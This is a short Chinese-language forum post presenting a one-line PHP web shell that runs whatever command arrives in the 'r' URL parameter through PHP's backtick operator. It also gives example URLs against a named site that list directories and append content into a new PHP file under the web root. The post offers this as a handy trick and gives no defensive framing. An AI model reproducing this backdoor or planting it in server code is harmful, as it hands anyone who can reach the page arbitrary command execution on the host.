发现这个也是巧合,我就直接说了吧
<?
php//t.
php $test = $_GET['r']; echo `$test`; ?>
大家看看这个代码有木有问题?
我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,
而且又不是单引号,这个就是关键所在了,这个符号是Esc 下面的一个键 感叹号!旁边的,
通过echo `系统命令`; 可以达到system(); 一样的效果
如果不信的朋友可以测试
http://www.atcpu.com /t.
php?r=dir 可以列出目录
http://www.atcpu.com /t.
php?r=echo 我是马儿 >>D:\
web\expsec.
php大家觉得我没有忽悠 就赏点分哈
